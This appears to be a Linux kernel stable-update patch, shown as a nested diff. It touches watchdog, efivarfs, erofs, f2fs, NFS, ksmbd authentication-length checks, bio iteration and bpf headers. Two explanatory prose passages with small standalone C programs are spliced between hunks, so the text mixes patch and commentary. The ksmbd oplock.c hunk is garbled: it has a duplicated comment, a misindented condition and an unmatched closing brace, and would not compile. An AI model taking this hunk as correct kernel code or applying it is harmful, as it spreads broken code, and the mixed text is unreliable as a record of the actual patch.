+@@ -295,6 +300,9 @@ static int rti_wdt_probe(struct platform_device *pdev)
+ 	if (last_ping)
+ 		watchdog_set_last_hw_keepalive(wdd, last_ping);
+ 
++	if (!watchdog_hw_running(wdd))
++		pm_runtime_put_sync(&pdev->dev);
++
+ 	return 0;
+ 
+ err_iomap:
+@@ -309,7 +317,10 @@ static int rti_wdt_remove(struct platform_device *pdev)
+ 	struct rti_wdt_device *wdt = platform_get_drvdata(pdev);
+ 
+ 	watchdog_unregister_device(&wdt->wdd);
+-	pm_runtime_put(&pdev->dev);
++
++	if (!pm_runtime_suspended(&pdev->dev))
++		pm_runtime_put(&pdev->dev);
++
+ 	pm_runtime_disable(&pdev->dev);
+ 
+ 	return 0;
+diff --git a/drivers/watchdog/watchdog_dev.c b/drivers/watchdog/watchdog_dev.c
+index fdffa6859dde3..81684d89dc98f 100644
+--- a/drivers/watchdog/watchdog_dev.c
++++ b/drivers/watchdog/watchdog_dev.c
+@@ -1052,6 +1052,7 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 
+ 	/* Fill in the data structures */
+ 	cdev_init(&wd_data->cdev, &watchdog_fops);
++	wd_data->cdev.owner = wdd->ops->owner;
+ 
+ 	/* Add the device */
+ 	err = cdev_device_add(&wd_data->cdev, &wd_data->dev);
+@@ -1066,8 +1067,6 @@ static int watchdog_cdev_register(struct watchdog_device *wdd)
+ 		return err;
+ 	}
+ 
+-	wd_data->cdev.owner = wdd->ops->owner;
+-
+ 	/* Record time of most recent heartbeat as 'just before now'. */
+ 	wd_data->last_hw_keepalive = ktime_sub(ktime_get(), 1);
+ 	watchdog_set_open_deadline(wd_data);
+diff --git a/fs/efivarfs/super.c b/fs/efivarfs/super.c
+index 6780fc81cc11f..77c7615bba5e1 100644
+--- a/fs/efivarfs/super.c
++++ b/fs/efivarfs/super.c
+@@ -13,6 +13,7 @@
+ #include <linux/ucs2_string.h>
+ #include <linux/slab.h>
+ #include <linux/magic.h>
++#include <linux/printk.h>
+ 
+ #include "internal.h"
+ 
+@@ -226,8 +227,19 @@ static int efivarfs_get_tree(struct fs_context *fc)
+ 	return get_tree_single(fc, efivarfs_fill_super);
+ }
+ 
++static int efivarfs_reconfigure(struct fs_context *fc)
++{
++	if (!efivar_supports_writes() && !(fc->sb_flags & SB_RDONLY)) {
++		pr_err("Firmware does not support SetVariableRT. Can not remount with rw\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
+ static const struct fs_context_operations efivarfs_context_ops = {
+ 	.get_tree	= efivarfs_get_tree,
++	.reconfigure	= efivarfs_reconfigure,
+ };
+ 
+ static int efivarfs_init_fs_context(struct fs_context *fc)
+@@ -238,10 +250,13 @@ static int efivarfs_init_fs_context(struct fs_context *fc)
+ 
+ static void efivarfs_kill_sb(struct super_block *sb)
+ {
++	struct efivarfs_fs_info *sfi = sb->s_fs_info;
++
+ 	kill_litter_super(sb);
+ 
+ 	/* Remove all entries and destroy */
+ 	efivar_entry_iter(efivarfs_destroy, &efivarfs_list, NULL);
++	kfree(sfi);
+ }
+ 
+ static struct file_system_type efivarfs_type = {
+diff --git a/fs/erofs/zdata.c b/fs/erofs/zdata.c
+index 1b91ac5be9610..cf9a2fa7f55d2 100644
+--- a/fs/erofs/zdata.c
++++ b/fs/erofs/zdata.c
+@@ -1192,12 +1192,11 @@ out:
+ 		put_page(page);
+ 	} else {
+ 		for (i = 0; i < pclusterpages; ++i) {
+-			page = pcl->compressed_bvecs[i].page;
++			/* consider shortlived pages added when decompressing */
++			page = be->compressed_pages[i];
+ 
+ 			if (erofs_page_is_managed(sbi, page))
+ 				continue;
+-
+-			/* recycle all individual short-lived pages */
+ 			(void)z_erofs_put_shortlivedpage(be->pagepool, page);
+ 			WRITE_ONCE(pcl->compressed_bvecs[i].page, NULL);
+ 		}
+diff --git a/fs/f2fs/data.c b/fs/f2fs/data.c
+index 3666c1fd77a64..8b561af379743 100644
+--- a/fs/f2fs/data.c
++++ b/fs/f2fs/data.c
+@@ -2490,9 +2490,6 @@ int f2fs_encrypt_one_page(struct f2fs_io_info *fio)
+ 
+ 	page = fio->compressed_page ? fio->compressed_page : fio->page;
+ 
+-	/* wait for GCed page writeback via META_MAPPING */
+-	f2fs_wait_on_block_writeback(inode, fio->old_blkaddr);
+-
+ 	if (fscrypt_inode_uses_inline_crypto(inode))
+ 		return 0;
+ 
+@@ -2681,6 +2678,10 @@ got_it:
+ 		goto out_writepage;
+ 	}
+ 
++	/* wait for GCed page writeback via META_MAPPING */
++	if (fio->post_read)
++		f2fs_wait_on_block_writeback(inode, fio->old_blkaddr);
++
+ 	/*
+ 	 * If current allocation needs SSR,
+ 	 * it had better in-place writes for updated data.
+diff --git a/fs/f2fs/file.c b/fs/f2fs/file.c
+index 9b9fb3c57ec6c..fd22854dbeaea 100644
+--- a/fs/f2fs/file.c
++++ b/fs/f2fs/file.c
+@@ -42,7 +42,7 @@ static vm_fault_t f2fs_filemap_fault(struct vm_fault *vmf)
+ 	vm_fault_t ret;
+ 
+ 	ret = filemap_fault(vmf);
+-	if (!ret)
++	if (ret & VM_FAULT_LOCKED)
+ 		f2fs_update_iostat(F2FS_I_SB(inode), inode,
+ 					APP_MAPPED_READ_IO, F2FS_BLKSIZE);
+ 
+@@ -2821,6 +2821,11 @@ static int f2fs_move_file_range(struct file *file_in, loff_t pos_in,
+ 			goto out;
+ 	}
+ 
++	if (f2fs_compressed_file(src) || f2fs_compressed_file(dst)) {
++		ret = -EOPNOTSUPP;
++		goto out_unlock;
++	}
++
+ 	ret = -EINVAL;
+ 	if (pos_in + len > src->i_size || pos_in + len < pos_in)
+ 		goto out_unlock;
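
In the f2fs_filemap_fault() hunk above, the iostat update was effectively dead code: filemap_fault() signals success with the VM_FAULT_LOCKED bit, not a zero return, so the old "!ret" test never matched a successful fault. A tiny illustration; the VM_FAULT_LOCKED value is assumed to mirror include/linux/mm_types.h:

#include <stdio.h>

#define VM_FAULT_LOCKED 0x0200u	/* assumed to mirror <linux/mm_types.h> */

static void account_fault(unsigned int ret)
{
	if (ret & VM_FAULT_LOCKED)	/* old test was "if (!ret)" */
		printf("count APP_MAPPED_READ_IO\n");
	else
		printf("not counted\n");
}

int main(void)
{
	account_fault(VM_FAULT_LOCKED);	/* successful fault: now counted */
	account_fault(0x0001u);		/* an error bit, e.g. OOM: skipped */
	return 0;
}
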
+diff --git a/fs/f2fs/namei.c b/fs/f2fs/namei.c
+index bd020a992c2e7..328cd20b16a54 100644
+--- a/fs/f2fs/namei.c
++++ b/fs/f2fs/namei.c
+@@ -1099,7 +1099,7 @@ static int f2fs_rename(struct user_namespace *mnt_userns, struct inode *old_dir,
+ 	}
+ 
+ 	if (old_dir_entry) {
+-		if (old_dir != new_dir && !whiteout)
++		if (old_dir != new_dir)
+ 			f2fs_set_link(old_inode, old_dir_entry,
+ 						old_dir_page, new_dir);
+ 		else
+diff --git a/fs/f2fs/node.c b/fs/f2fs/node.c
+index 6efccd7ccfe1b..c6d0e07096326 100644
+--- a/fs/f2fs/node.c
++++ b/fs/f2fs/node.c
+@@ -2738,11 +2738,11 @@ recover_xnid:
+ 	f2fs_update_inode_page(inode);
+ 
+ 	/* 3: update and set xattr node page dirty */
+-	if (page)
++	if (page) {
+ 		memcpy(F2FS_NODE(xpage), F2FS_NODE(page),
+ 				VALID_XATTR_BLOCK_SIZE);
+-
+-	set_page_dirty(xpage);
++		set_page_dirty(xpage);
++	}
+ 	f2fs_put_page(xpage, 1);
+ 
+ 	return 0;
+diff --git a/fs/f2fs/xattr.c b/fs/f2fs/xattr.c
+index 8816e13ca7c9e..0631b383e21f4 100644
+--- a/fs/f2fs/xattr.c
++++ b/fs/f2fs/xattr.c
+@@ -660,11 +660,14 @@ retry:
+ 	here = __find_xattr(base_addr, last_base_addr, NULL, index, len, name);
+ 	if (!here) {
+ 		if (!F2FS_I(inode)->i_xattr_nid) {
++			error = f2fs_recover_xattr_data(inode, NULL);
+ 			f2fs_notice(F2FS_I_SB(inode),
+-				"recover xattr in inode (%lu)", inode->i_ino);
+-			f2fs_recover_xattr_data(inode, NULL);
+-			kfree(base_addr);
+-			goto retry;
++				"recover xattr in inode (%lu), error(%d)",
++					inode->i_ino, error);
++			if (!error) {
++				kfree(base_addr);
++				goto retry;
++			}
+ 		}
+ 		f2fs_err(F2FS_I_SB(inode), "set inode (%lu) has corrupted xattr",
+ 								inode->i_ino);
+diff --git a/fs/gfs2/rgrp.c b/fs/gfs2/rgrp.c
+index f602fb8449519..dcaaa32efc4a0 100644
+--- a/fs/gfs2/rgrp.c
++++ b/fs/gfs2/rgrp.c
+@@ -2306,7 +2306,7 @@ void gfs2_rgrp_dump(struct seq_file *seq, struct gfs2_rgrpd *rgd,
+ 		       (unsigned long long)rgd->rd_addr, rgd->rd_flags,
+ 		       rgd->rd_free, rgd->rd_free_clone, rgd->rd_dinodes,
+ 		       rgd->rd_requested, rgd->rd_reserved, rgd->rd_extfail_pt);
+-	if (rgd->rd_sbd->sd_args.ar_rgrplvb) {
++	if (rgd->rd_sbd->sd_args.ar_rgrplvb && rgd->rd_rgl) {
+ 		struct gfs2_rgrp_lvb *rgl = rgd->rd_rgl;
+ 
+ 		gfs2_print_dbg(seq, "%s  L: f:%02x b:%u i:%u\n", fs_id_buf,
+diff --git a/fs/namespace.c b/fs/namespace.c
+index e04a9e9e3f14f..29a8d90dd1072 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -2693,7 +2693,12 @@ static int do_remount(struct path *path, int ms_flags, int sb_flags,
+ 	if (IS_ERR(fc))
+ 		return PTR_ERR(fc);
+ 
++	/*
++	 * Indicate to the filesystem that the remount request is coming
++	 * from the legacy mount system call.
++	 */
+ 	fc->oldapi = true;
++
+ 	err = parse_monolithic_mount_data(fc, data);
+ 	if (!err) {
+ 		down_write(&sb->s_umount);
+@@ -3027,6 +3032,12 @@ static int do_new_mount(struct path *path, const char *fstype, int sb_flags,
+ 	if (IS_ERR(fc))
+ 		return PTR_ERR(fc);
+ 
++	/*
++	 * Indicate to the filesystem that the mount request is coming
++	 * from the legacy mount system call.
++	 */
++	fc->oldapi = true;
++
+ 	if (subtype)
+ 		err = vfs_parse_fs_string(fc, "subtype",
+ 					  subtype, strlen(subtype));
+diff --git a/fs/nfs/blocklayout/blocklayout.c b/fs/nfs/blocklayout/blocklayout.c
+index 943aeea1eb160..6be13e0ec170d 100644
+--- a/fs/nfs/blocklayout/blocklayout.c
++++ b/fs/nfs/blocklayout/blocklayout.c
+@@ -580,6 +580,8 @@ retry:
+ 		nfs4_delete_deviceid(node->ld, node->nfs_client, id);
+ 		goto retry;
+ 	}
++
++	nfs4_put_deviceid_node(node);
+ 	return ERR_PTR(-ENODEV);
+ }
+ 
+@@ -893,10 +895,9 @@ bl_pg_init_write(struct nfs_pageio_descriptor *pgio, struct nfs_page *req)
+ 	}
+ 
+ 	if (pgio->pg_dreq == NULL)
+-		wb_size = pnfs_num_cont_bytes(pgio->pg_inode,
+-					      req->wb_index);
++		wb_size = pnfs_num_cont_bytes(pgio->pg_inode, req->wb_index);
+ 	else
+-		wb_size = nfs_dreq_bytes_left(pgio->pg_dreq);
++		wb_size = nfs_dreq_bytes_left(pgio->pg_dreq, req_offset(req));
+ 
+ 	pnfs_generic_pg_init_write(pgio, req, wb_size);
+ 
+diff --git a/fs/nfs/direct.c b/fs/nfs/direct.c
+index 3bb530d4bb5ce..8fdb65e1b14a3 100644
+--- a/fs/nfs/direct.c
++++ b/fs/nfs/direct.c
+@@ -195,9 +195,10 @@ static void nfs_direct_req_release(struct nfs_direct_req *dreq)
+ 	kref_put(&dreq->kref, nfs_direct_req_free);
+ }
+ 
+-ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq)
++ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq, loff_t offset)
+ {
+-	return dreq->bytes_left;
++	loff_t start = offset - dreq->io_start;
++	return dreq->max_count - start;
+ }
+ EXPORT_SYMBOL_GPL(nfs_dreq_bytes_left);
+ 
+diff --git a/fs/nfs/internal.h b/fs/nfs/internal.h
+index 4b07a0508f9d8..35a8ae46b6c34 100644
+--- a/fs/nfs/internal.h
++++ b/fs/nfs/internal.h
+@@ -640,7 +640,7 @@ extern int nfs_sillyrename(struct inode *dir, struct dentry *dentry);
+ /* direct.c */
+ void nfs_init_cinfo_from_dreq(struct nfs_commit_info *cinfo,
+ 			      struct nfs_direct_req *dreq);
+-extern ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq);
++extern ssize_t nfs_dreq_bytes_left(struct nfs_direct_req *dreq, loff_t offset);
+ 
+ /* nfs4proc.c */
+ extern struct nfs_client *nfs4_init_client(struct nfs_client *clp,
+diff --git a/fs/nfs/nfs4proc.c b/fs/nfs/nfs4proc.c
+index 85a952143e9fb..ec3f0103e1a7f 100644
+--- a/fs/nfs/nfs4proc.c
++++ b/fs/nfs/nfs4proc.c
+@@ -170,6 +170,7 @@ static int nfs4_map_errors(int err)
+ 	case -NFS4ERR_RESOURCE:
+ 	case -NFS4ERR_LAYOUTTRYLATER:
+ 	case -NFS4ERR_RECALLCONFLICT:
++	case -NFS4ERR_RETURNCONFLICT:
+ 		return -EREMOTEIO;
+ 	case -NFS4ERR_WRONGSEC:
+ 	case -NFS4ERR_WRONG_CRED:
+@@ -558,6 +559,7 @@ static int nfs4_do_handle_exception(struct nfs_server *server,
+ 		case -NFS4ERR_GRACE:
+ 		case -NFS4ERR_LAYOUTTRYLATER:
+ 		case -NFS4ERR_RECALLCONFLICT:
++		case -NFS4ERR_RETURNCONFLICT:
+ 			exception->delay = 1;
+ 			return 0;
+ 
+@@ -9667,6 +9669,7 @@ nfs4_layoutget_handle_exception(struct rpc_task *task,
+ 		status = -EBUSY;
+ 		break;
+ 	case -NFS4ERR_RECALLCONFLICT:
++	case -NFS4ERR_RETURNCONFLICT:
+ 		status = -ERECALLCONFLICT;
+ 		break;
+ 	case -NFS4ERR_DELEG_REVOKED:
+diff --git a/fs/nfs/pnfs.c b/fs/nfs/pnfs.c
+index 1ffb1068216b6..4448ff829cbb9 100644
+--- a/fs/nfs/pnfs.c
++++ b/fs/nfs/pnfs.c
+@@ -2729,7 +2729,8 @@ pnfs_generic_pg_init_read(struct nfs_pageio_descriptor *pgio, struct nfs_page *r
+ 		if (pgio->pg_dreq == NULL)
+ 			rd_size = i_size_read(pgio->pg_inode) - req_offset(req);
+ 		else
+-			rd_size = nfs_dreq_bytes_left(pgio->pg_dreq);
++			rd_size = nfs_dreq_bytes_left(pgio->pg_dreq,
++						      req_offset(req));
+ 
+ 		pgio->pg_lseg =
+ 			pnfs_update_layout(pgio->pg_inode, nfs_req_openctx(req),
+diff --git a/fs/pstore/ram_core.c b/fs/pstore/ram_core.c
+index 1e755d093d921..f479e0755a247 100644
+--- a/fs/pstore/ram_core.c
++++ b/fs/pstore/ram_core.c
+@@ -190,7 +190,7 @@ static int persistent_ram_init_ecc(struct persistent_ram_zone *prz,
+ {
+ 	int numerr;
+ 	struct persistent_ram_buffer *buffer = prz->buffer;
+-	int ecc_blocks;
++	size_t ecc_blocks;
+ 	size_t ecc_total;
+ 
+ 	if (!ecc_info || !ecc_info->ecc_size)
+diff --git a/fs/smb/server/asn1.c b/fs/smb/server/asn1.c
+index 4a4b2b03ff33d..b931a99ab9c85 100644
+--- a/fs/smb/server/asn1.c
++++ b/fs/smb/server/asn1.c
+@@ -214,10 +214,15 @@ static int ksmbd_neg_token_alloc(void *context, size_t hdrlen,
+ {
+ 	struct ksmbd_conn *conn = context;
+ 
++	if (!vlen)
++		return -EINVAL;
++
+ 	conn->mechToken = kmemdup_nul(value, vlen, GFP_KERNEL);
+ 	if (!conn->mechToken)
+ 		return -ENOMEM;
+ 
++	conn->mechTokenLen = (unsigned int)vlen;
++
+ 	return 0;
+ }
+ 
+diff --git a/fs/smb/server/connection.c b/fs/smb/server/connection.c
+index b6fa1e285c401..7977827c65410 100644
+--- a/fs/smb/server/connection.c
++++ b/fs/smb/server/connection.c
+@@ -415,13 +415,7 @@ static void stop_sessions(void)
+ again:
+ 	down_read(&conn_list_lock);
+ 	list_for_each_entry(conn, &conn_list, conns_list) {
+-		struct task_struct *task;
+-
+ 		t = conn->transport;
+-		task = t->handler;
+-		if (task)
+-			ksmbd_debug(CONN, "Stop session handler %s/%d\n",
+-				    task->comm, task_pid_nr(task));
+ 		ksmbd_conn_set_exiting(conn);
+ 		if (t->ops->shutdown) {
+ 			up_read(&conn_list_lock);
+diff --git a/fs/smb/server/connection.h b/fs/smb/server/connection.h
+index 3c005246a32e8..0e04cf8b1d896 100644
+--- a/fs/smb/server/connection.h
++++ b/fs/smb/server/connection.h
+@@ -88,6 +88,7 @@ struct ksmbd_conn {
+ 	__u16				dialect;
+ 
+ 	char				*mechToken;
++	unsigned int			mechTokenLen;
+ 
+ 	struct ksmbd_conn_ops	*conn_ops;
+ 
+@@ -134,7 +135,6 @@ struct ksmbd_transport_ops {
+ struct ksmbd_transport {
+ 	struct ksmbd_conn		*conn;
+ 	struct ksmbd_transport_ops	*ops;
+-	struct task_struct		*handler;
+ };
+ 
+ #define KSMBD_TCP_RECV_TIMEOUT	(7 * HZ)
+diff --git a/fs/smb/server/oplock.c b/fs/smb/server/oplock.c
+index af0f6914eca45..f1831e26adad9 100644
+--- a/fs/smb/server/oplock.c
++++ b/fs/smb/server/oplock.c
+@@ -1191,6 +1191,12 @@ int smb_grant_oplock(struct ksmbd_work *work, int req_op_level, u64 pid,
+ 	bool prev_op_has_lease;
+ 	__le32 prev_op_state = 0;
+ 
++	/* Only v2 leases handle the directory */
++	/* Only v2 leases handle directories */
++		if (!lctx || lctx->version != 2)
++			return 0;
++	}
++
+ 	opinfo = alloc_opinfo(work, pid, tid);
+ 	if (!opinfo)
+ 		return -ENOMEM;
+diff --git a/fs/smb/server/smb2pdu.c b/fs/smb/server/smb2pdu.c
+index 46070951d163a..6826b562073e0 100644
+--- a/fs/smb/server/smb2pdu.c
++++ b/fs/smb/server/smb2pdu.c
+@@ -1412,7 +1412,10 @@ static struct ksmbd_user *session_user(struct ksmbd_conn *conn,
+ 	char *name;
+ 	unsigned int name_off, name_len, secbuf_len;
+ 
+-	secbuf_len = le16_to_cpu(req->SecurityBufferLength);
++	if (conn->use_spnego && conn->mechToken)
++		secbuf_len = conn->mechTokenLen;
++	else
++		secbuf_len = le16_to_cpu(req->SecurityBufferLength);
+ 	if (secbuf_len < sizeof(struct authenticate_message)) {
+ 		ksmbd_debug(SMB, "blob len %d too small\n", secbuf_len);
+ 		return NULL;
+@@ -1503,7 +1506,10 @@ static int ntlm_authenticate(struct ksmbd_work *work,
+ 		struct authenticate_message *authblob;
+ 
+ 		authblob = user_authblob(conn, req);
+-		sz = le16_to_cpu(req->SecurityBufferLength);
++		if (conn->use_spnego && conn->mechToken)
++			sz = conn->mechTokenLen;
++		else
++			sz = le16_to_cpu(req->SecurityBufferLength);
+ 		rc = ksmbd_decode_ntlmssp_auth_blob(authblob, sz, conn, sess);
+ 		if (rc) {
+ 			set_user_flag(sess->user, KSMBD_USER_FLAG_BAD_PASSWORD);
+@@ -1776,8 +1782,7 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 
+ 	negblob_off = le16_to_cpu(req->SecurityBufferOffset);
+ 	negblob_len = le16_to_cpu(req->SecurityBufferLength);
+-	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer) ||
+-	    negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++	if (negblob_off < offsetof(struct smb2_sess_setup_req, Buffer)) {
+ 		rc = -EINVAL;
+ 		goto out_err;
+ 	}
+@@ -1786,8 +1791,15 @@ int smb2_sess_setup(struct ksmbd_work *work)
+ 			negblob_off);
+ 
+ 	if (decode_negotiation_token(conn, negblob, negblob_len) == 0) {
+-		if (conn->mechToken)
++		if (conn->mechToken) {
+ 			negblob = (struct negotiate_message *)conn->mechToken;
++			negblob_len = conn->mechTokenLen;
++		}
++	}
++
++	if (negblob_len < offsetof(struct negotiate_message, NegotiateFlags)) {
++		rc = -EINVAL;
++		goto out_err;
+ 	}
+ 
+ 	if (server_conf.auth_mechs & conn->auth_mechs) {
+diff --git a/fs/smb/server/smb_common.c b/fs/smb/server/smb_common.c
+index d160363c09ebc..e90a1e8c1951d 100644
+--- a/fs/smb/server/smb_common.c
++++ b/fs/smb/server/smb_common.c
+@@ -158,8 +158,12 @@ int ksmbd_verify_smb_message(struct ksmbd_work *work)
+  */
+ bool ksmbd_smb_request(struct ksmbd_conn *conn)
+ {
+-	__le32 *proto = (__le32 *)smb2_get_msg(conn->request_buf);
++	__le32 *proto;
+ 
++	if (conn->request_buf[0] != 0)
++		return false;
++
++	proto = (__le32 *)smb2_get_msg(conn->request_buf);
+ 	if (*proto == SMB2_COMPRESSION_TRANSFORM_ID) {
+ 		pr_err_ratelimited("smb2 compression not support yet");
+ 		return false;
+diff --git a/fs/smb/server/transport_rdma.c b/fs/smb/server/transport_rdma.c
+index c5629a68c8b73..8faa25c6e129b 100644
+--- a/fs/smb/server/transport_rdma.c
++++ b/fs/smb/server/transport_rdma.c
+@@ -2039,6 +2039,7 @@ static bool rdma_frwr_is_supported(struct ib_device_attr *attrs)
+ static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+ {
+ 	struct smb_direct_transport *t;
++	struct task_struct *handler;
+ 	int ret;
+ 
+ 	if (!rdma_frwr_is_supported(&new_cm_id->device->attrs)) {
+@@ -2056,11 +2057,11 @@ static int smb_direct_handle_connect_request(struct rdma_cm_id *new_cm_id)
+ 	if (ret)
+ 		goto out_err;
+ 
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
+-					      smb_direct_port);
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
+-		ret = PTR_ERR(KSMBD_TRANS(t)->handler);
++	handler = kthread_run(ksmbd_conn_handler_loop,
++			      KSMBD_TRANS(t)->conn, "ksmbd:r%u",
++			      smb_direct_port);
++	if (IS_ERR(handler)) {
++		ret = PTR_ERR(handler);
+ 		pr_err("Can't start thread\n");
+ 		goto out_err;
+ 	}
+diff --git a/fs/smb/server/transport_tcp.c b/fs/smb/server/transport_tcp.c
+index eff7a1d793f00..9d4222154dcc0 100644
+--- a/fs/smb/server/transport_tcp.c
++++ b/fs/smb/server/transport_tcp.c
+@@ -185,6 +185,7 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 	struct sockaddr *csin;
+ 	int rc = 0;
+ 	struct tcp_transport *t;
++	struct task_struct *handler;
+ 
+ 	t = alloc_transport(client_sk);
+ 	if (!t) {
+@@ -199,13 +200,13 @@ static int ksmbd_tcp_new_connection(struct socket *client_sk)
+ 		goto out_error;
+ 	}
+ 
+-	KSMBD_TRANS(t)->handler = kthread_run(ksmbd_conn_handler_loop,
+-					      KSMBD_TRANS(t)->conn,
+-					      "ksmbd:%u",
+-					      ksmbd_tcp_get_port(csin));
+-	if (IS_ERR(KSMBD_TRANS(t)->handler)) {
++	handler = kthread_run(ksmbd_conn_handler_loop,
++			      KSMBD_TRANS(t)->conn,
++			      "ksmbd:%u",
++			      ksmbd_tcp_get_port(csin));
++	if (IS_ERR(handler)) {
+ 		pr_err("cannot start conn thread\n");
+-		rc = PTR_ERR(KSMBD_TRANS(t)->handler);
++		rc = PTR_ERR(handler);
+ 		free_transport(t);
+ 	}
+ 	return rc;
+diff --git a/include/crypto/if_alg.h b/include/crypto/if_alg.h
+index a5db86670bdfa..a406e281ae571 100644
+--- a/include/crypto/if_alg.h
++++ b/include/crypto/if_alg.h
+@@ -138,6 +138,7 @@ struct af_alg_async_req {
+  *			recvmsg is invoked.
+  * @init:		True if metadata has been sent.
+  * @len:		Length of memory allocated for this data structure.
++ * @inflight:		Non-zero when AIO requests are in flight.
+  */
+ struct af_alg_ctx {
+ 	struct list_head tsgl_list;
+@@ -156,6 +157,8 @@ struct af_alg_ctx {
+ 	bool init;
+ 
+ 	unsigned int len;
++
++	unsigned int inflight;
+ };
+ 
+ int af_alg_register_type(const struct af_alg_type *type);
+diff --git a/include/drm/drm_bridge.h b/include/drm/drm_bridge.h
+index 6b656ea23b964..a76f4103d48bd 100644
+--- a/include/drm/drm_bridge.h
++++ b/include/drm/drm_bridge.h
+@@ -191,7 +191,7 @@ struct drm_bridge_funcs {
+ 	 * or &drm_encoder_helper_funcs.dpms hook.
+ 	 *
+ 	 * The bridge must assume that the display pipe (i.e. clocks and timing
+-	 * singals) feeding it is no longer running when this callback is
++	 * signals) feeding it is no longer running when this callback is
+ 	 * called.
+ 	 *
+ 	 * The @post_disable callback is optional.
+diff --git a/include/dt-bindings/clock/qcom,videocc-sm8150.h b/include/dt-bindings/clock/qcom,videocc-sm8150.h
+index e24ee840cfdb8..c557b78dc572f 100644
+--- a/include/dt-bindings/clock/qcom,videocc-sm8150.h
++++ b/include/dt-bindings/clock/qcom,videocc-sm8150.h
+@@ -16,6 +16,10 @@
+ 
+ /* VIDEO_CC Resets */
+ #define VIDEO_CC_MVSC_CORE_CLK_BCR	0
++#define VIDEO_CC_INTERFACE_BCR		1
++#define VIDEO_CC_MVS0_BCR		2
++#define VIDEO_CC_MVS1_BCR		3
++#define VIDEO_CC_MVSC_BCR		4
+ 
+ /* VIDEO_CC GDSCRs */
+ #define VENUS_GDSC			0
+diff --git a/include/linux/bio.h b/include/linux/bio.h
+index 2c5806997bbf7..2b9fc5edf49d6 100644
+--- a/include/linux/bio.h
++++ b/include/linux/bio.h
+@@ -279,6 +279,11 @@ static inline void bio_first_folio(struct folio_iter *fi, struct bio *bio,
+ {
+ 	struct bio_vec *bvec = bio_first_bvec_all(bio) + i;
+ 
++	if (unlikely(i >= bio->bi_vcnt)) {
++		fi->folio = NULL;
++		return;
++	}
++
+ 	fi->folio = page_folio(bvec->bv_page);
+ 	fi->offset = bvec->bv_offset +
+ 			PAGE_SIZE * (bvec->bv_page - &fi->folio->page);
+@@ -296,10 +301,8 @@ static inline void bio_next_folio(struct folio_iter *fi, struct bio *bio)
+ 		fi->offset = 0;
+ 		fi->length = min(folio_size(fi->folio), fi->_seg_count);
+ 		fi->_next = folio_next(fi->folio);
+-	} else if (fi->_i + 1 < bio->bi_vcnt) {
+-		bio_first_folio(fi, bio, fi->_i + 1);
+ 	} else {
+-		fi->folio = NULL;
++		bio_first_folio(fi, bio, fi->_i + 1);
+ 	}
+ }
+ 
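
The bio folio-iterator rework moves the end-of-bio bounds check into bio_first_folio() so that bio_next_folio() has a single re-entry path and callers simply loop until folio is NULL. The same control-flow shape, reduced to a generic iterator sketch with invented names and types:

#include <stdio.h>

struct iter {
	const char **items;
	int n, i;
	const char *cur;
};

static void first_item(struct iter *it, int i)
{
	if (i >= it->n) {	/* the bounds check now lives here */
		it->cur = NULL;
		return;
	}
	it->i = i;
	it->cur = it->items[i];
}

static void next_item(struct iter *it)
{
	/* single exit path, mirroring the reworked bio_next_folio() */
	first_item(it, it->i + 1);
}

int main(void)
{
	const char *segs[] = { "seg0", "seg1", "seg2" };
	struct iter it = { segs, 3, 0, NULL };

	for (first_item(&it, 0); it.cur; next_item(&it))
		printf("%s\n", it.cur);
	return 0;
}
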
+diff --git a/include/linux/blkdev.h b/include/linux/blkdev.h
+index 07a7eeef47d39..e255674a9ee72 100644
+--- a/include/linux/blkdev.h
++++ b/include/linux/blkdev.h
+@@ -1109,11 +1109,12 @@ static inline bool bdev_is_partition(struct block_device *bdev)
+ enum blk_default_limits {
+ 	BLK_MAX_SEGMENTS	= 128,
+ 	BLK_SAFE_MAX_SECTORS	= 255,
+-	BLK_DEF_MAX_SECTORS	= 2560,
+ 	BLK_MAX_SEGMENT_SIZE	= 65536,
+ 	BLK_SEG_BOUNDARY_MASK	= 0xFFFFFFFFUL,
+ };
+ 
++#define BLK_DEF_MAX_SECTORS 2560u
++
+ static inline unsigned long queue_segment_boundary(const struct request_queue *q)
+ {
+ 	return q->limits.seg_boundary_mask;
+diff --git a/include/linux/bpf.h b/include/linux/bpf.h
+index ba22cf4f5fc0e..c04a61ffac8ae 100644
+--- a/include/linux/bpf.h
++++ b/include/linux/bpf.h
+@@ -102,7 +102,11 @@ struct bpf_map_ops {
+ 	/* funcs called by prog_array and perf_event_array map */
+ 	void *(*map_fd_get_ptr)(struct bpf_map *map, struct file *map_file,
+ 				int fd);
+-	void (*map_fd_put_ptr)(void *ptr);
++	/* If need_defer is true, the implementation should guarantee that
++	 * the to-be-put element is still alive before the bpf program, which
++	 * may manipulate it, exits.
++	 */
++	void (*map_fd_put_ptr)(struct bpf_map *map, void *ptr, bool need_defer);
+ 	int (*map_gen_lookup)(struct bpf_map *map, struct bpf_insn *insn_buf);
+ 	u32 (*map_fd_sys_lookup_elem)(void *ptr);
+ 	void (*map_seq_show_elem)(struct bpf_map *map, void *key,
+@@ -233,7 +237,11 @@ struct bpf_map {
+ 	 */
+ 	atomic64_t refcnt ____cacheline_aligned;
+ 	atomic64_t usercnt;
+-	struct work_struct work;
++	/* rcu is used before freeing and work is only used during freeing */
++	union {
++		struct work_struct work;
++		struct rcu_head rcu;
++	};
+ 	struct mutex freeze_mutex;
+ 	atomic64_t writecnt;
+ 	/* 'Ownership' of program-containing map is claimed by the first program
+@@ -249,6 +257,8 @@ struct bpf_map {
+ 	} owner;
+ 	bool bypass_spec_v1;
+ 	bool frozen; /* write-once; write-protected by freeze_mutex */
++	bool free_after_mult_rcu_gp;
++	s64 __percpu *elem_count;
+ };
+ 
+ static inline bool map_value_has_spin_lock(const struct bpf_map *map)
+@@ -1791,6 +1801,35 @@ bpf_map_alloc_percpu(const struct bpf_map *map, size_t size, size_t align,
+ }
+ #endif
+ 
